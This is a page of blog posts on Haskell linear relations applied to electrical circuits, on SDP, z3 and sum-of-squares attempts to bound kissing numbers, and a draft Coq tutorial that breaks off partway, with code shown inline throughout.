http://www.philipzucker.com/a-short-skinny-on-relations-towards-the-algebra-of-programming/. In that blog post, I used finite relations. In principle, they are simple to work with. We can perform relation algebra operations like composition, meet, and join by brute force enumeration. Unfortunately, brute force may not always be an option. First off, the finite relations grow so enormous as to be make this infeasible. Secondly, it is not insane to talk about relations or regions with an infinite number of elements, such as some continuous blob in 2D space. In that case, we can’t even in principle enumerate all the points in the region. What are we to do? We need to develop some kind of finite parametrization of regions to manipulate. This parametrization basically can’t possibly be complete in some sense, and we may choose more or less powerful systems of description for computational reasons. In this post, we are going to be talking about linear or affine subspaces of a continuous space. These subspaces are hyperplanes. Linear subspaces have to go through the origin, while affine spaces can have an offset from the origin. In the previous post, I mentioned that the finite relations formed a lattice, with operations meet and join. These operations were the same as set intersection and union so the introduction of the extra terminology meet and join felt a bit unwarranted. Now the meet and join aren’t union and intersection anymore. We have chosen to not have the capability to represent the union of two vectors, instead we can only represent the smallest subspace that contains them both, which is the union closed under vector addition. For example, the join of a line and point will be the plane that goes through both. Linear/Affine stuff is great because it is so computational. Most questions you cant to ask are answerable by readily available numerical linear algebra packages. In this case, we’ll use the Haskell package HMatrix, which is something like a numpy/scipy equivalent for Haskell. We’re going to use type-level indices to denote the sizes and partitioning of these spaces so we’ll need some helper functions. 
In case I miss any extensions, make typos, etc, you can find a complete compiling version here https://github.com/philzook58/ConvexCat/blob/master/src/LinRel.hs type BEnum a = (Enum a, Bounded a) -- cardinality. size was already taken by HMatrix :( card :: forall a. (BEnum a) => Int card = (fromEnum (maxBound @a)) - (fromEnum (minBound @a)) + 1 In analogy with sets of tuples for defining finite relations, we partition the components of the linear spaces to be “input” and “output” indices/variables $\begin{bmatrix} x_1 & x_2 & x_3 & ... & y_1 & y_2 & y_3 & ... \end{bmatrix}$. This partition is somewhat arbitrary and easily moved around, but the weakening of strict notions of input and output as compared to functions is the source of the greater descriptive power of relations. Relations are extensions of functions, so linear relations are an extension of linear maps. A linear map has the form $y = Ax$. A linear relation has the form $Ax + By = 0$. An affine map has the form $y = Ax + b$ and an affine relation has the form $Ax + By = b$. There are at least two useful concrete representation for subspaces. 1. We can write a matrix $A$ and vector $b$ down that corresponds to affine constraints. $Ax = b$. The subspace described is the nullspace of $A$ plus a solution of the equation. The rows of A are orthogonal to the space. 2. We can hold onto generators of subspace. $x = A' l+b$ where l parametrizes the subspace. In other words, the subspace is generated by / is the span of the columns of $A'$. It is the range of $A'$. We’ll call these two representations the H-Rep and V-Rep, borrowing terminology from similar representations in polytopes (describing a polytope by the inequalities that define it’s faces or as the convex combination of it’s vertices). https://inf.ethz.ch/personal/fukudak/lect/pclect/notes2015/PolyComp2015.pdf These two representations are dual in many respects. -- HLinRel holds A x = b constraint data HLinRel a b = HLinRel (Matrix Double) (Vector Double) deriving Show -- x = A l + b. Generator constraint. data VLinRel a b = VLinRel (Matrix Double) (Vector Double) deriving Show It is useful to have both reps and interconversion routines, because different operations are easy in the two representations. Any operations defined on one can be defined on the other by sandwiching between these conversion functions. Hence, we basically only need to define operations for one of the reps (if we don’t care too much about efficiency loss which, fair warning, is out the window for today). The bulk of computation will actually be performed by these interconversion routines. The HMatrix function nullspace performs an SVD under the hood and gathers up the space with 0 singular values. -- if A x = b then x is in the nullspace + a vector b' solves the equation h2v :: HLinRel a b -> VLinRel a b h2v (HLinRel a b) = VLinRel a' b' where b' = a <\> b -- least squares solution a' = nullspace a -- if x = A l + b, then A' . x = A' A l + A' b = A' b because A' A = 0 v2h :: VLinRel a b -> HLinRel a b v2h (VLinRel a' b') = HLinRel a b where b = a #> b' -- matrix multiply a = tr $nullspace (tr a') -- orthogonal space to range of a. -- tr is transpose and not trace? A little bit odd, HMatrix. These linear relations form a category. I’m not using the Category typeclass because I need BEnum constraints hanging around. The identity relations is $x = y$ aka $Ix - Iy = 0$. hid :: forall a. 
BEnum a => HLinRel a a hid = HLinRel (i ||| (- i)) (vzero s) where s = card @a i = ident s Composing relations is done by combining the constraints of the two relations and then projecting out the interior variables. Taking the conjunction of constraints is easiest in the H-Rep, where we just need to vertically stack the individual constraints. Projection easily done in the V-rep, where you just need to drop the appropriate section of the generator vectors. So we implement this operation by flipping between the two. hcompose :: forall a b c. (BEnum a, BEnum b, BEnum c) => HLinRel b c -> HLinRel a b -> HLinRel a c hcompose (HLinRel m b) (HLinRel m' b') = let a'' = fromBlocks [[ ma', mb' , 0 ], [ 0 , mb, mc ]] in let b'' = vjoin [b', b] in let (VLinRel q p) = h2v (HLinRel a'' b'') in -- kind of a misuse let q' = (takeRows ca q) -- drop rows belonging to @b === (dropRows (ca + cb) q) in let [x,y,z] = takesV [ca,cb,cc] p in let p'= vjoin [x,z] in -- rebuild without rows for @b v2h (VLinRel q' p') -- reconstruct HLinRel where ca = card @a cb = card @b cc = card @c sb = size b -- number of constraints in first relation sb' = size b' -- number of constraints in second relation ma' = takeColumns ca m' mb' = dropColumns ca m' mb = takeColumns cb m mc = dropColumns cb m (<<<) :: forall a b c. (BEnum a, BEnum b, BEnum c) => HLinRel b c -> HLinRel a b -> HLinRel a c (<<<) = hcompose We can implement the general cadre of relation operators, meet, join, converse. I feel the converse is the most relational thing of all. It makes inverting a function nearly a no-op. hjoin :: HLinRel a b -> HLinRel a b -> HLinRel a b hjoin v w = v2h$ vjoin' (h2v v) (h2v w) -- hmatrix took vjoin from me :( -- joining means combining generators and adding a new generator -- Closed under affine combination l * x1 + (1 - l) * x2 vjoin' :: VLinRel a b -> VLinRel a b -> VLinRel a b vjoin' (VLinRel a b) (VLinRel a' b') = VLinRel (a ||| a' ||| (asColumn (b - b'))) b -- no constraints, everything -- trivially true htop :: forall a b. (BEnum a, BEnum b) => HLinRel a b htop = HLinRel (vzero (1,ca + cb)) (konst 0 1) where ca = card @a cb = card @b -- hbottom? hconverse :: forall a b. (BEnum a, BEnum b) => HLinRel a b -> HLinRel b a hconverse (HLinRel a b) = HLinRel ( (dropColumns ca a) ||| (takeColumns ca a)) b where ca = card @a cb = card @b Relational inclusion is the question of subspace inclusion. It is fairly easy to check if a VRep is in an HRep (just see plug the generators into the constraints and see if they obey them) and by using the conversion functions we can define it for arbitrary combos of H and V. -- forall l. A' ( A l + b) == b' -- is this numerically ok? I'm open to suggestions. vhsub :: VLinRel a b -> HLinRel a b -> Bool vhsub (VLinRel a b) (HLinRel a' b') = (naa' <= 1e-10 * (norm_2 a') * (norm_2 a) ) && ((norm_2 ((a' #> b) - b')) <= 1e-10 * (norm_2 b') ) where naa' = norm_2 (a' <> a) hsub :: HLinRel a b -> HLinRel a b -> Bool hsub h1 h2 = vhsub (h2v h1) h2 heq :: HLinRel a b -> HLinRel a b -> Bool heq a b = (hsub a b) && (hsub b a) instance Ord (HLinRel a b) where (<=) = hsub (>=) = flip hsub instance Eq (HLinRel a b) where (==) = heq It is useful the use the direct sum of the spaces as a monoidal product. hpar :: HLinRel a b -> HLinRel c d -> HLinRel (Either a c) (Either b d) hpar (HLinRel mab v) (HLinRel mcd v') = HLinRel (fromBlocks [ [mab, 0], [0 , mcd]]) (vjoin [v, v']) where hleft :: forall a b. 
(BEnum a, BEnum b) => HLinRel a (Either a b) hleft = HLinRel ( i ||| (- i) ||| (konst 0 (ca,cb))) (konst 0 ca) where ca = card @a cb = card @b i = ident ca hright :: forall a b. (BEnum a, BEnum b) => HLinRel b (Either a b) hright = HLinRel ( i ||| (konst 0 (cb,ca)) ||| (- i) ) (konst 0 cb) where ca = card @a cb = card @b i = ident cb htrans :: HLinRel a (Either b c) -> HLinRel (Either a b) c htrans (HLinRel m v) = HLinRel m v hswap :: forall a b. (BEnum a, BEnum b) => HLinRel (Either a b) (Either b a) hswap = HLinRel (fromBlocks [[ia ,0,0 ,-ia], [0, ib,-ib,0]]) (konst 0 (ca + cb)) where ca = card @a cb = card @b ia = ident ca ib = ident cb hsum :: forall a. BEnum a => HLinRel (Either a a) a hsum = HLinRel ( i ||| i ||| - i ) (konst 0 ca) where ca = card @a i= ident ca hdup :: forall a. BEnum a => HLinRel a (Either a a) hdup = HLinRel (fromBlocks [[i, -i,0 ], [i, 0, -i]]) (konst 0 (ca + ca)) where ca = card @a i= ident ca hdump :: HLinRel a Void hdump = HLinRel 0 0 hlabsorb ::forall a. BEnum a => HLinRel (Either Void a) a hlabsorb = HLinRel m v where (HLinRel m v) = hid @a A side note: Void causes some consternation. Void is the type with no elements and is the index type of a 0 dimensional space. It is the unit object of the monoidal product. Unfortunately by an accident of the standard Haskell definitions, actual Void is not a BEnum. So, I did a disgusting hack. Let us not discuss it more. ### Circuits Baez and Fong have an interesting paper where they describe building circuits using a categorical graphical calculus. We have the pieces to go about something similar. What we have here is a precise way in which circuit diagrams can be though of as string diagrams in a monoidal category of linear relations. An idealized wire has two quantities associated with it, the current flowing through it and the voltage it is at. -- a 2d space at every wire or current and voltage. data IV = I | V deriving (Show, Enum, Bounded, Eq, Ord) When we connect wires, the currents must be conserved and the voltages must be equal. hid and hcompose from above still achieve that. Composing two independent circuits in parallel is achieve by hpar. We will want some basic tinker toys to work with. A resistor in series has the same current at both ends and a voltage drop proportional to the current resistor :: Double -> HLinRel IV IV resistor r = HLinRel ( (2><4) [ 1,0,-1, 0, r, 1, 0, -1]) (konst 0 2) Composing two resistors in parallel adds the resistance. (resistor r1) <<< (resistor r2) == resistor (r1 + r2)) A bridging resistor allows current to flow between the two branches bridge :: Double -> HLinRel (Either IV IV) (Either IV IV) bridge r = HLinRel ( (4><8) [ 1,0, 1, 0, -1, 0, -1, 0, -- current conservation 0, 1, 0, 0, 0, -1 , 0, 0, --voltage maintained left 0, 0, 0, 1, 0, 0, 0, -1, -- voltage maintained right r, 1, 0,-1, -r, 0, 0, 0 ]) (konst 0 4) Composing two bridge circuits is putting the bridge resistors in parallel. The conductance $G=\frac{1}{R}$ of resistors in parallel adds. hcompose (bridge r1) (bridge r2) == bridge 1 / (1/r1 + 1/r2). An open circuit allows no current to flow and ends a wire. open ~ resistor infinity open :: HLinRel IV Void open = HLinRel (fromList [[1,0]]) (konst 0 1) At branching points, the voltage is maintained, but the current splits. 
cmerge :: HLinRel (Either IV IV) IV cmerge = HLinRel (fromList [[1, 0, 1, 0, -1, 0], [0,1,0,0,0 ,-1 ], [0,0,0,1, 0, -1]]) (konst 0 3) This cmerge combinator could also be built using a short == bridge 0 , composing a branch with open, and then absorbing the Void away. We can bend wires up or down by using a composition of cmerge and open. cap :: HLinRel (Either IV IV) Void cap = hcompose open cmerge cup :: HLinRel Void (Either IV IV) cup = hconverse cap ground :: HLinRel IV Void ground = HLinRel ( (1><2) [ 0 , 1 ]) (vzero 1) Voltage and current sources enforce current and voltage to be certain values vsource :: Double -> HLinRel IV IV vsource v = HLinRel ( (2><4) [ 1,0,-1, 0, 0, 1, 0, -1]) (fromList [0,v]) isource :: Double -> HLinRel IV IV isource i = HLinRel (fromList [ [1,0, -1, 0], -- current conservation [1, 0, 0, 0]]) (fromList [0,i]) Measurements of circuits proceed by probes. type VProbe = () vprobe :: HLinRel IV VProbe vprobe = HLinRel ( (2><3) [1,0,0, 0,1,-1]) (konst 0 2) Inductors and capacitors could be included easily, but would require the entries of the HMatrix values to be polynomials in the frequency $\omega$, which it does not support (but it could!). We'll leave those off for another day. We actually can determine that the rules suggested above are being followed by computation. r20 :: HLinRel IV IV r20 = resistor 20 main :: IO () main = do print (r20 == (hid <<< r20)) print (r20 == r20 <<< hid) print (r20 == (hmeet r20 r20)) print $resistor 50 == r20 <<< (resistor 30) print$ (bridge 10) <<< (bridge 10) == (bridge 5) print $v2h (h2v r20) == r20 print$ r20 <= htop print $hconverse (hconverse r20) == r20 print$ (open <<< r20) == open ### Bits and Bobbles • Homogenous systems are usually a bit more elegant to deal with, although a bit more unfamiliar and abstract. • Could make a pandas like interface for linear relations that uses numpy/scipy.sparse for the computation. All the swapping and associating is kind of fun to design, not so much to use. Labelled n-way relations are nice for users. • Implicit/Lazy evaluation. We should let the good solvers do the work when possible. We implemented our operations eagerly. We don't have to. By allowing hidden variables inside our relations, we can avoid the expensive linear operations until it is useful to actually compute on them. • Relational division = quotient spaces? • DSL. One of the beauties of the pointfree/categorical approach is that you avoid the need for binding forms. This makes for a very easily manipulated DSL. The transformations feel like those of ordinary algebra and you don't have to worry about the subtleties of index renaming or substitution under binders. • Sparse is probably really good. We have lots of identity matrices and simple rearrangements. It is very wasteful to use dense operations on these. • Schur complement https://en.wikipedia.org/wiki/Schur_complement are the name in the game for projecting out pieces of linear problems. We have some overlap. • Linear relations -> Polyhedral relations -> Convex Relations. Linear is super computable, polyhedral can blow up. Rearrange a DSL to abuse Linear programming as much as possible for queries. • Network circuits. There is an interesting subclass of circuits that is designed to be pretty composable. https://en.wikipedia.org/wiki/Two-port_network Two port networks are a very useful subclass of electrical circuits. They model transmission lines fairly well, and easily composable for filter construction. 
It is standard to describe these networks by giving a linear function between two variables and the other two variables. Depending on your choice of which variables depend on which, these are called the z-parameters, y-parameters, h-parameters, scattering parameters, abcd parameters. There are tables of formula for converting from one form to the others. The different parameters hold different use cases for composition and combining in parallel or series. From the perspective of linear relations this all seems rather silly. The necessity for so many descriptions and the confusing relationship between them comes from the unnecessary and overly rigid requirement of have a linear function-like relationship rather than just a general relation, which depending of the circuit may not even be available (there are degenerate configurations where two of the variables do not imply the values of the other two). A function relationship is always a lie (although a sometimes useful one), as there is always back-reaction of new connections. -- voltage divider divider :: Double -> Double -> HLinRel (Either IV IV) (Either IV IV) divider r1 r2 = hcompose (bridge r2) (hpar (resistor r1) hid) The relation model also makes clearer how to build lumped models out of continuous ones. https://en.wikipedia.org/wiki/Lumped-element_model null • Because the type indices have no connection to the actual data types (they are phantom) it is a wise idea to use smart constructors that check that the sizes of the matrices makes sense. -- smart constructors hLinRel :: forall a b. (BEnum a, BEnum b) => Matrix Double -> Vector Double -> Maybe (HLinRel a b) hLinRel m v | cols m == (ca + cb) && (size v == rows m) = Just (HLinRel m v) | otherwise = Nothing where ca = card @a cb = card @b • Nonlinear circuits. Grobner Bases and polynomial relations? • Quadratic optimization under linear constraints. Can't get it to come out right yet. Clutch for Kalman filters. Nice for many formulations like least power, least action, minimum energy principles. Edit: I did more in this direction here http://www.philipzucker.com/categorical-lqr-control-with-linear-relations/ • Quadratic Operators -> Convex operators. See last chapter of Rockafellar. • Duality of controllers and filters. It is well known (I think) that for ever controller algorithm there is a filter algorithm that is basically the same thing. • LQR - Kalman • Viterbi filter - Value function table • particle filter - Monte Carlo control • Extended Kalman - iLQR-ish? Use local approximation of dynamics • unscented kalman - ? ## Failing to Bound Kissing Numbers https://en.wikipedia.org/wiki/Kissing_number Cody brought up the other day the kissing number problem.Kissing numbers are the number of equal sized spheres you can pack around another one in d dimensions. It’s fairly self evident that the number is 2 for 1-d and 6 for 2d but 3d isn’t so obvious and in fact puzzled great mathematicians for a while. He was musing that it was interesting that he kissing numbers for some dimensions are not currently known, despite the fact that the first order theory of the real numbers is decidable https://en.wikipedia.org/wiki/Decidability_of_first-order_theories_of_the_real_numbers I suggested on knee jerk that Sum of Squares might be useful here. I see inequalities and polynomials and then it is the only game in town that I know anything about. Apparently that knee jerk was not completely wrong https://arxiv.org/pdf/math/0608426.pdf Somehow SOS/SDP was used for bounds here. 
I had an impulse that the problem feels SOS-y but I do not understand their derivation. One way the problem can be formulated is by finding or proving there is no solution to the following set of equations constraining the centers $x_i$ of the spheres. Set the central sphere at (0,0,0,…) . Make the radii 1. Then$\forall i. |x_i|^2 = 2^2$ and $\forall i j. |x_i - x_j|^2 \ge 2^2$ I tried a couple different things and have basically failed. I hope maybe I’ll someday have a follow up post where I do better. So I had 1 idea on how to approach this via a convex relaxation Make a vector $x = \begin{bmatrix} x_0 & y _0 & x_1 & y _1 & x_2 & y _2 & ... \end{bmatrix}$ Take the outer product of this vector $x^T x = X$ Then we can write the above equations as linear equalities and inequalities on X. If we forget that we need X to be the outer product of x (the relaxation step), this becomes a semidefinite program. Fingers crossed, maybe the solution comes back as a rank 1 matrix. Other fingers crossed, maybe the solution comes back and says it’s infeasible. In either case, we have solved our original problem. import numpy as np import cvxpy as cvx d = 2 n = 6 N = d * n x = cvx.Variable((N+1,N+1), symmetric=True) c = [] c += [x >> 0] c += [x[0,0] == 1] # x^2 + y^2 + z^2 + ... == 2^2 constraint x1 = x[1:,1:] for i in range(n): q = 0 for j in range(d): q += x1[d*i + j, d*i + j] c += [q == 4] #[ x1[2*i + 1, 2*i + 1] + x[2*i + 2, 2*i + 2] == 4] #c += [x1[0,0] == 2, x1[1,1] >= 0] #c += [x1[2,2] >= 2] # (x - x) + (y - y) >= 4 for i in range(n): for k in range(i): q = 0 for j in range(d): q += x1[d*i + j, d*i + j] + x1[d*k + j, d*k + j] - 2 * x1[d*i + j, d*k + j] # xk ^ 2 - 2 * xk * xi c += [q >= 4] print(c) obj = cvx.Maximize(cvx.trace(np.random.rand(N+1,N+1) @ x )) prob = cvx.Problem(obj, c) print(prob.solve(verbose=True)) u, s, vh = np.linalg.svd(x.value) print(s) import matplotlib.pyplot as plt xy = vh[0,1:].reshape(-1,2) print(xy) plt.scatter(xy[0], xy[1] ) plt.show() Didn’t work though. Sigh. It’s conceivable we might do better if we start packing higher powers into x? Ok Round 2. Let’s just ask z3 and see what it does. I’d trust z3 with my baby’s soft spot. It solves for 5 and below. Z3 grinds to a halt on N=6 and above. It ran for days doin nothing on my desktop. from z3 import * import numpy as np d = 2 # dimensions n = 6 # number oif spheres x = np.array([ [ Real("x_%d_%d" % (i,j)) for j in range(d) ] for i in range(n)]) print(x) c = [] ds = np.sum(x**2, axis=1) c += [ d2 == 4 for d2 in ds] # centers at distance 2 from origin ds = np.sum( (x.reshape((-1,1,d)) - x.reshape((1,-1,d)))**2, axis = 2) c += [ ds[i,j] >= 4 for i in range(n) for j in range(i)] # spheres greater than dist 2 apart c += [x[0,0] == 2] print(c) print(solve(c)) Ok. A different tact. Try to use a positivstellensatz proof. If you have a bunch of polynomial inequalities and equalities if you sum polynomial multiples of these constraints, with the inequalities having sum of square multiples, in such a way to = -1, it shows that there is no real solution to them. We have the distance from origin as equality constraint and distance from each other as an inequality constraint. I intuitively think of the positivstellensatz as deriving an impossibility from false assumptions. You can’t add a bunch of 0 and positive numbers are get a negative number, hence there is no real solution. I have a small set of helper functions for combining sympy and cvxpy for sum of squares optimization. 
I keep it here along with some other cute little constructs https://github.com/philzook58/cvxpy-helpers import cvxpy as cvx from sympy import * import random ''' The idea is to use raw cvxpy and sympy as much as possible for maximum flexibility. Construct a sum of squares polynomial using sospoly. This returns a variable dictionary mapping sympy variables to cvxpy variables. You are free to the do polynomial operations (differentiation, integration, algerba) in pure sympy When you want to express an equality constraint, use poly_eq(), which takes the vardict and returns a list of cvxpy constraints. Once the problem is solved, use poly_value to get back the solution polynomials. That some polynomial is sum of squares can be expressed as the equality with a fresh polynomial that is explicility sum of sqaures. With the approach, we get the full unbridled power of sympy (including grobner bases!) I prefer manually controlling the vardict to having it auto controlled by a class, just as a I prefer manually controlling my constraint sets Classes suck. ''' def cvxify(expr, cvxdict): # replaces sympy variables with cvx variables in sympy expr return lambdify(tuple(cvxdict.keys()), expr)(*cvxdict.values()) def sospoly(terms, name=None): ''' returns sum of squares polynomial using terms, and vardict mapping to cvxpy variables ''' if name == None: name = str(random.getrandbits(32)) N = len(terms) xn = Matrix(terms) Q = MatrixSymbol(name, N,N) p = (xn.T * Matrix(Q) * xn)[0] Qcvx = cvx.Variable((N,N), PSD=True) vardict = {Q : Qcvx} return p, vardict def polyvar(terms,name=None): ''' builds sumpy expression and vardict for an unknown linear combination of the terms ''' if name == None: name = str(random.getrandbits(32)) N = len(terms) xn = Matrix(terms) Q = MatrixSymbol(name, N, 1) p = (xn.T * Matrix(Q))[0] Qcvx = cvx.Variable((N,1)) vardict = {Q : Qcvx} return p, vardict def scalarvar(name=None): return polyvar([1], name) def worker(x ): (expr,vardict) = x return cvxify(expr, vardict) == 0 def poly_eq(p1, p2 , vardict): ''' returns a list of cvxpy constraints ''' dp = p1 - p2 polyvars = list(dp.free_symbols - set(vardict.keys())) print("hey") p, opt = poly_from_expr(dp, gens = polyvars, domain = polys.domains.EX) #This is brutalizing me print(opt) print("buddo") return [ cvxify(expr, vardict) == 0 for expr in p.coeffs()] ''' import multiprocessing import itertools pool = multiprocessing.Pool() return pool.imap_unordered(worker, zip(p.coeffs(), itertools.repeat(vardict))) ''' def vardict_value(vardict): ''' evaluate numerical values of vardict ''' return {k : v.value for (k, v) in vardict.items()} def poly_value(p1, vardict): ''' evaluate polynomial expressions with vardict''' return cvxify(p1, vardict_value(vardict)) if __name__ == "__main__": x = symbols('x') terms = [1, x, x**2] #p, cdict = polyvar(terms) p, cdict = sospoly(terms) c = poly_eq(p, (1 + x)**2 , cdict) print(c) prob = cvx.Problem(cvx.Minimize(1), c) prob.solve() print(factor(poly_value(p, cdict))) # global poly minimization vdict = {} t, d = polyvar([1], name='t') vdict.update(d) p, d = sospoly([1,x,x**2], name='p') vdict.update(d) constraints = poly_eq(7 + x**2 - t, p, vdict) obj = cvx.Maximize( cvxify(t,vdict) ) prob = cvx.Problem(obj, constraints) prob.solve() print(poly_value(t,vdict)) and here is the attempted positivstellensatz. import sos import cvxpy as cvx from sympy import * import numpy as np d = 2 N = 7 # a grid of a vector field. 
indices = (xposition, yposition, vector component) '''xs = [ [symbols("x_%d_%d" % (i,j)) for j in range(d)] for i in range(N) ] gens = [x for l in xs for x in l ] xs = np.array([[poly(x,gens=gens, domain=polys.domains.EX) for x in l] for l in xs]) ''' xs = np.array([ [symbols("x_%d_%d" % (i,j)) for j in range(d)] for i in range(N) ]) c1 = np.sum( xs * xs, axis=1) - 1 c2 = np.sum((xs.reshape(-1,1,d) - xs.reshape(1,-1,d))**2 , axis=2) - 1 print(c1) print(c2) terms0 = [1] terms1 = terms0 + list(xs.flatten()) terms2 = [ terms1[i]*terms1[j] for j in range(N+1) for i in range(j+1)] #print(terms1) #print(terms2) vdict = {} psatz = 0 for c in c1: lam, d = sos.polyvar(terms2) vdict.update(d) psatz += lam*c for i in range(N): for j in range(i): c = c2[i,j] lam, d = sos.sospoly(terms2) vdict.update(d) psatz += lam*c #print(type(psatz)) print("build constraints") constraints = sos.poly_eq(psatz, -1, vdict) #print("Constraints: ", len(constraints)) obj = cvx.Minimize(1) #sum([cvx.sum(v) for v in vdict.values()])) print("build prob") prob = cvx.Problem(obj, constraints) print("solve") prob.solve(verbose=True, solver= cvx.SCS) It worked in 1-d, but did not work in 2d. At order 3 polynomials N=7, I maxed out my ram. I also tried doing it in Julia, since sympy was killing me. Julia already has a SOS package using JuMP using SumOfSquares using DynamicPolynomials using SCS N = 10 d = 2 @polyvar x[1:N,1:d] X = monomials(reshape(x,d*N), 0:2) X1 = monomials(reshape(x,d*N), 0:4) model = SOSModel(with_optimizer(SCS.Optimizer)) acc = nothing for t in sum(x .* x, dims=2) #print(t) p = @variable(model, [1:1], Poly(X1)) #print(p) if acc != nothing acc += p * (t - 1) else acc = p * (t - 1) end end for i in range(1,stop=N) for j in range(1,stop=i-1) d = x[i,:] - x[j,:] p = @variable(model, [1:1], SOSPoly(X)) acc += p * (sum(d .* d) - 1) end end #print(acc) print(typeof(acc)) @constraint(model, acc[1] == -1 ) optimize!(model) It was faster to encode, but it’s using the same solver (SCS), so basically the same thing. I should probably be reducing the system with respect to equality constraints since they’re already in a Groebner basis. I know that can be really important for reducing the size of your problem I dunno. Blah blah blah blah A bunch of unedited trash https://github.com/peterwittek/ncpol2sdpa Peter Wittek has probably died in an avalanche? That is very sad. These notes https://web.stanford.edu/class/ee364b/lectures/sos_slides.pdf Positivstullensatz. kissing number Review of sum of squares minimimum sample as LP. ridiculous problem min t st. f(x_i) – t >= 0 dual -> one dual variable per sample point The only dual that will be non zero is that actually selecting the minimum. Hm. Yeah, that’s a decent analogy. How does the dual even have a chance of knowing about poly airhtmetic? It must be during the SOS conversion prcoess. In building the SOS constraints, we build a finite, limittted version of polynomial multiplication x as a matrix. x is a shift matrix. In prpducing the characterstic polynomial, x is a shift matrix, with the last line using the polynomial known to be zero to eigenvectors of this matrix are zeros of the poly. SOS does not really on polynomials persay. It relies on closure of the suqaring operaiton maybe set one sphere just at x=0 y = 2. That breaks some symmettry set next sphere in plane something. random plane through origin? order y components – breaks some of permutation symmettry. no, why not order in a random direction. 
That seems better for symmettry breaking ## Learn Coq in Y Edit: It’s up! https://learnxinyminutes.com/docs/coq/ I’ve been preparing a Learn X in Y tutorial for Coq. https://learnxinyminutes.com/ I’ve been telling people this and been surprised by how few people have heard of the site. It’s super quick intros to syntax and weirdness for a bunch of languages with inline code tutorials. I think that for me, a short description of that mundane syntactic and programming constructs of coq is helpful. Some guidance of the standard library, what is available by default. And dealing with Notation scopes, which is a pretty weird feature that most languages don’t have. The manual actually has all this now. It’s really good. Like check this section out https://coq.inria.fr/refman/language/coq-library.html . But the manual is an intimidating documents. It starts with a BNF description of syntax and things like that. The really useful pedagogical stuff is scattered throughout it. Anyway here is my draft (also here https://github.com/philzook58/learnxinyminutes-docs/blob/master/coq.html.markdown where the syntax highlighting isn’t so janked up). Suggestions welcome. Or if this gets accepted, you can just make pull requests --- language: Coq filename: learncoq.v contributors: - ["Philip Zucker", "http://www.philipzucker.com/"] --- The Coq system is a proof assistant. It is designed to build and verify mathematical proofs. The Coq system contains the functional programming language Gallina and is capable of proving properties about programs written in this language. Coq is a dependently typed language. This means that the types of the language may depend on the values of variables. In this respect, it is similar to other related languages such as Agda, Idris, F*, Lean, and others. Via the Curry-Howard correspondence, programs, properties and proofs are formalized in the same language. Coq is developed in OCaml and shares some syntactic and conceptual similiarity with it. Coq is a language containing many fascinating but difficult topics. This tutorial will focus on the programming aspects of Coq, rather than the proving. It may be helpful, but not necessary to learn some OCaml first, especially if you are unfamiliar with functional programming. This tutorial is based upon its OCaml equivalent The standard usage model of Coq is to write it with interactive tool assistance, which operates like a high powered REPL. Two common such editors are the CoqIDE and Proof General Emacs mode. Inside Proof General Ctrl+C will evaluate up to your cursor. coq (*** Comments ***) (* Comments are enclosed in (* and *). It's fine to nest comments. *) (* There are no single-line comments. *) (*** Variables and functions ***) (* The Coq proof assistant can be controlled and queried by a command language called the vernacular. Vernacular keywords are capitalized and the commands end with a period. Variable and function declarations are formed with the Definition vernacular. *) Definition x := 10. (* Coq can sometimes infer the types of arguments, but it is common practice to annotate with types. *) Definition inc_nat (x : nat) : nat := x + 1. (* There exists a large number of vernacular commands for querying information. These can be very useful. *) Compute (1 + 1). (* 2 : nat *) (* Compute a result. *) Check tt. (* tt : unit *) (* Check the type of an expressions *) About plus. (* Prints information about an object *) (* Print information including the definition *) Print true. 
(* Inductive bool : Set := true : Bool | false : Bool *) Search nat. (* Returns a large list of nat related values *) Search "_ + _". (* You can also search on patterns *) Search (?a -> ?a -> bool). (* Patterns can have named parameters *) Search (?a * ?a). (* Locate tells you where notation is coming from. Very helpful when you encounter new notation. *) Locate "+". (* Calling a function with insufficient number of arguments does not cause an error, it produces a new function. *) Definition make_inc x y := x + y. (* make_inc is int -> int -> int *) Definition inc_2 := make_inc 2. (* inc_2 is int -> int *) Compute inc_2 3. (* Evaluates to 5 *) (* Definitions can be chained with "let ... in" construct. This is roughly the same to assigning values to multiple variables before using them in expressions in imperative languages. *) Definition add_xy : nat := let x := 10 in let y := 20 in x + y. (* Pattern matching is somewhat similar to switch statement in imperative languages, but offers a lot more expressive power. *) Definition is_zero (x : nat) := match x with | 0 => true | _ => false (* The "_" pattern means "anything else". *) end. (* You can define recursive function definition using the Fixpoint vernacular.*) Fixpoint factorial n := match n with | 0 => 1 | (S n') => n * factorial n' end. (* Function application usually doesn't need parentheses around arguments *) Compute factorial 5. (* 120 : nat *) (* ...unless the argument is an expression. *) Compute factorial (5-1). (* 24 : nat *) (* You can define mutually recursive functions using "with" *) Fixpoint is_even (n : nat) : bool := match n with | 0 => true | (S n) => is_odd n end with is_odd n := match n with | 0 => false | (S n) => is_even n end. (* As Coq is a total programming language, it will only accept programs when it can understand they terminate. It can be most easily seen when the recursive call is on a pattern matched out subpiece of the input, as then the input is always decreasing in size. Getting Coq to understand that functions terminate is not always easy. See the references at the end of the artice for more on this topic. *) (* Anonymous functions use the following syntax: *) Definition my_square : nat -> nat := fun x => x * x. Definition my_id (A : Type) (x : A) : A := x. Definition my_id2 : forall A : Type, A -> A := fun A x => x. Compute my_id nat 3. (* 3 : nat *) (* You can ask Coq to infer terms with an underscore *) Compute my_id _ 3. (* An implicit argument of a function is an argument which can be inferred from contextual knowledge. Parameters enclosed in {} are implicit by default *) Definition my_id3 {A : Type} (x : A) : A := x. Compute my_id3 3. (* 3 : nat *) (* Sometimes it may be necessary to turn this off. You can make all arguments explicit again with @ *) Compute @my_id3 nat 3. (* Or give arguments by name *) Compute my_id3 (A:=nat) 3. (*** Notation ***) (* Coq has a very powerful Notation system that can be used to write expressions in more natural forms. *) Compute Nat.add 3 4. (* 7 : nat *) Compute 3 + 4. (* 7 : nat *) (* Notation is a syntactic transformation applied to the text of the program before being evaluated. Notation is organized into notation scopes. Using different notation scopes allows for a weak notion of overloading. *) (* Imports the Zarith module containing definitions related to the integers Z *) Require Import ZArith. (* Notation scopes can be opened *) Open Scope Z_scope. (* Now numerals and addition are defined on the integers. *) Compute 1 + 7. 
